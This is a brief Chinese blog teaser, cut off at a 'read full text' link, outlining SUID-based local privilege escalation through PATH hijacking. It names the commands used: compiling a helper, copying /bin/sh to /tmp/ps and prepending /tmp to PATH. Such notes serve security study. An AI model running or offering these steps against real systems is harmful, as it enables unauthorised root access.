lusang

摘要： 配合SUID本地环境变量提权 思路原理：利用sh环境变量替换，使得/tmp/ps得到root权限；ps=sh 过程：手写调用文件-编译-复制文件-增加环境变量-执行 gcc demon1.c -o shell cp /bin/sh /tmp/ps export PATH=/tmp:$PATH # w 阅读全文